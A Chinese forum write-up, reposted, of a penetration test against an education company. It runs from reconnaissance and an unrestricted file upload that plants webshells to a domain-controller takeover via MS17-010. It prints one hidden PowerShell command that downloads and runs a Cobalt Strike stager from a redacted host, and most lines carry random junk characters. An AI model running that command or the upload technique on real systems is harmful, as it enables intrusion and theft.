|
1 g0 x5 E+ O. Q" |: U1 N
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路( M* d! c, U" f3 ]7 e# _+ ?
0 t- j5 [. l$ b6 Q( t7 O
- I. A! v2 Y1 {0 @ ! T% G7 w* _( X- R
' c2 u4 P% @7 w! g. u) I' S; ^
l4 c/ n0 K( b3 p* F 正文/ s# {3 `. Z( U* h- h0 |
% e( N+ F, F7 e7 o
* ~4 K3 ?# L0 k
+ P1 c- G& A3 k7 }, Q8 q
- M6 e: Y) }) ~; B( t9 Y
; |+ r: \+ ^8 N5 ~" V; `. O
目标:www.xxxx.com(一家教育机构)
& _+ c& ]+ ], `; J0 E3 a
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能0 k; j2 v. ^$ Z. C! b$ q
7 h% m1 @: {1 V* b. z
: r1 d; R8 ]+ s3 N6 d 
% u G- _1 d+ D5 Y. F- A f+ b4 Z$ k& |& z/ r
4 p/ o! h+ s- N8 u& M 进行了简单的信息搜集
; Q7 [1 w% o2 b: }
& `1 u/ T$ _5 G) m% c" H, S
' c0 l5 w: r& E$ t; u
1 @; `4 S/ j# P! p, r0 s
( R9 h; S2 Q6 L) ~9 P' ^/ I/ ?- j 子域名搜集. [, N7 A: [7 j' Q+ a+ y' f4 K6 j
# m& h7 W5 E8 v
1 ?! a; ~0 v% E: t' V3 h( _$ O9 \
 5 u! g+ _5 ]3 J9 v
" ^. n7 N) b+ x1 B1 z3 |; i }9 Q
1 ]& o. h6 H$ v; j. P' x, D fofa找资产
7 J9 I3 C/ q7 ]0 F. ^
& L" |- R. O2 l$ o; d: v
/ k1 z# I3 v0 T! k( w 5 A0 D$ v% q6 m; c( a% q
$ g" ^3 q; x, m9 B( R. i
& k4 a: N7 B' e, O) M( V) C $ Y# x: d( w3 F2 N* a6 c. H
4 M+ Q# }% E: Z8 ~6 G I
一共七个资产。去重之后只有两个。
, z$ b! { d) Q
5 a: G- b% j. I5 X8 f! C3 I
- l; R: w5 |( J! i# l' w t" V) c N. K! k
& Y; q+ @% R6 y- J3 g
目录探测
/ J; W! V' \6 P- V4 m
1 Q5 Z/ y/ r7 \+ e1 S: t# N7 B$ `; ^) F; o: G- [. A2 z
 # w# q9 @/ P) x& e) V! h$ b$ m/ A
- v& a. [5 F. \" R) A# p
! s5 u- X; J. _7 G8 u 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
' N6 j; \& |0 F
7 {! e# o9 J. ~# W; y
8 R$ ]9 _$ ~$ x8 \; Y8 |. F2 G: v - I9 Z& C/ A7 i; E7 C, n
) C0 Z1 c- r7 n) w6 R4 k 我又尝试了通过修改返回包来绕过登录界面* u( A& P' L T8 M3 V
& l8 m( [& B: }! \4 n
; O. `9 y9 J' S! }; p. S  ; Q( i; W1 ?# B# R$ q: A+ C
2 ?+ ^1 ]" s9 L" F& F2 @+ Y/ c- J# x2 {( y2 c2 a
还是不行,尝试注入无果3 F w j: z& e; ?$ x
& _# {/ w! |# @; z
: R& n" z& Z2 B* y7 F, O
 6 M4 N- D% K. G, N7 U9 _2 o
. {/ v3 p+ p/ Q# h) K0 z/ r
( o/ M, N, {2 m 不过我目录探测出了一处Spring信息泄露
- V9 M2 M1 ~/ s+ ~+ y
7 R6 I, @4 t& I. K+ q. Y7 V
9 E. l9 l3 _8 d& D( Q# W W
3 }; W0 H) N* \5 }: ?$ X$ E* C }- X0 M
 % o0 c( ?+ |2 W9 h, n' [ j# ^2 P
0 N3 O+ i _8 I7 v. W0 M' U3 o. l- P4 `1 |6 X3 ?
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
; y1 X. i0 N" I : X6 C, f8 i. j* U q
8 ?0 L/ m) s) `9 I: F1 B! t  1 ]. L0 |0 Q3 {, P7 q. q# h
) J, R0 X$ w g+ v7 Y
" M8 Y' i: P5 B$ f. k' ~ 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
; v+ n& g W/ m* V
1 Q: o% @7 b4 d% C' F% ^/ m9 u2 U, E$ j. C4 t/ L
$ L* _+ z5 x/ e9 o( T* S- O ! L! j8 j& q4 E
5 ^( c+ M8 H4 h! \' g7 N M" V 获取有些师傅到这一步就手机抓包电脑测了。) A. }4 h9 a$ \1 m# `( E) z9 A' |
6 j7 L1 P" t: X9 W4 ]8 D5 L6 F. I% F3 K0 w
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。2 P, n5 O; L4 P. F5 G' }
# r( d2 c @" M* p: [$ w! [: T, \* _7 `* q+ K. s% h
其中在一个公众号发现了小程序,可以进行注册。3 y2 V' q* a( z) B- v2 }1 b9 O" A
8 o% ]! @% w9 r
- ?, D0 z0 c+ d7 }+ \$ j 看到了头像上传,尝试上传获取WebShell) h' ]3 ^( L7 }' E
) `- s4 R, i: o2 Z! q; Q4 F( ~
. {2 C. N. z/ y; s. [6 \  5 p R _% r1 [3 q' {3 p2 [
* `3 G: B* x1 U. D2 V
) k( g3 S6 X" J/ [, n+ m+ l: J
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问4 t S6 l6 F. f
* R! |4 M7 }9 M. f: n3 s) ^
% d* p/ p0 ]8 e. f/ Z" P) Y% _
 - L. L4 M+ q" A. e
# g4 H2 {4 }5 n, E+ B- P1 y, l. J% E- W& d s9 V
然后上了大马. d3 C: _) U- V. A& D
# N8 l8 f5 X) J6 h# P
1 |& }8 C& O/ U/ I; y
 ! L4 N7 d1 E+ t, ?) U
# O# v% p, z1 v: S& b' E, c2 P
% E# m$ U3 y p& r+ |+ ]& n& _
 5 N3 j0 t; @/ n6 L
% u( t: G3 D% ?0 C! k, |" k ?
+ d3 m2 B* C% H' w1 Y* M1 y! V 通过翻找文件发现数据库账号密码
" Y# G8 @) d7 m: L0 V Q2 T X' U+ U: M3 y: D+ h$ J. {
8 @/ f% T/ s7 x. ?/ F0 a  6 w, k2 ^/ w$ d! w8 c
9 Z# U# `1 H- Q" U$ C9 b
; K5 R& y! p6 p& F' C( k
--内网渗透+ C8 v' C6 }% L
1 R1 H `" Z5 |; R1 U6 t" p" x
7 `8 v9 l/ m: ~5 D0 h+ M 直接通过powershell执行 cs上线
# z" `7 |5 F" s% ^5 U9 n& S # x" o2 E# Z1 t8 j1 Z! Y
- H- J" ]6 b E/ `. W6 O) L9 R
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" @! h3 C, d" Q- D6 K* c
7 x3 U+ s$ Z2 K+ i7 k+ Y6 V) k2 T; ?1 j& W' L
 ; Y9 C0 _- E$ j& t7 V. U
+ z, h9 j5 `, [0 V6 j' S U6 D+ {
# ?9 b' D4 o- P2 A' }1 k1 T$ z% J
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破$ {: R# W! p3 j7 ?
: a& h1 l$ U3 y6 M. N3 |0 E% }
& b: _/ @8 B6 F/ J4 Z7 z" {
 3 J$ {! H# E v
: b# I4 \7 z0 \
# P1 s" ]/ w; ]+ p3 f% G7 m 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
5 W; G# `7 I2 B+ i
6 i- @2 ]+ k: b+ s7 J% i
8 C8 L I& G3 u
: }' n5 F0 P7 o. f$ m
3 J$ J- @- y5 ~9 _
- }; @3 o: A& o 
: ?, B ^5 g2 F
& k& ?6 O( g8 U7 R! \7 l
4 ?( v* U7 `$ k4 _' J% A1 ?7 p U r. m 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
D# \8 u( F; b4 z" m# c, j& W/ J
4 P! e- g! V. n& g# O) [4 }! r
7 y5 U* f) L1 m8 ^5 \
1 W( j$ b! d8 E4 J4 t$ \" a0 G ^) ^6 w. `
 ; l# z; T B$ V1 u0 _& `
) L% ]1 z- W6 d2 X( s
8 n) V+ \" {- |& G2 ?. |
0 D$ a' e3 }! l6 w/ K
9 K, X* C$ A: ~, x
" T: y8 e) t& G9 e. A: l- [7 g: Q
5 Q A7 M% |2 Z% v
0 T/ S9 V' I7 q4 r' @& }
. X ^5 A# Q. W) i- W( B4 E 3 b2 n' C6 t7 c
+ ^1 ^4 i6 j" m+ R8 W) c9 Z# y$ b 小结4 g/ S7 t) } X1 `. ]: h; _; b
! G# ?$ n% C8 \3 [8 R
4 h) j. {% f) k! d( [ 5 f3 g! H2 P+ N+ x0 b* V' V
) t" ~7 ~% q! s& H0 P$ V F6 v% o M' e
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!& A% |, ~; o$ W# y3 @8 \$ A- Z: ]8 l
- ^5 X7 _5 k6 U/ r* E
4 h8 \1 X3 u* T T1 E! X & ]+ m2 ?- o' i# Z( W; @& r
8 I( G2 l+ @. X
; G, A) [4 {9 ~! @ -
; P j/ O g& b 3 u. C3 g+ ?" F' K! K1 U' H4 S
& y4 m% ~9 i! d$ b. r
- $ j: G( \; d+ F7 i5 c6 _
5 N$ p3 C- n4 C& N! |4 ?; ?1 [1 o' G
& l* S9 I+ c. j3 B4 ^/ [
/ w6 F$ H. K$ M# O& f; |- K$ t
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
$ s5 z/ s+ X2 X ; ]0 n/ f& n$ D7 s6 D, S+ r' i
* c' ?+ H: b/ L3 _% @( C
: _6 T4 I/ [0 n' M3 w D" b$ ?- H- A | 
发表于 2024-3-1 19:41:32
收藏
支持
反对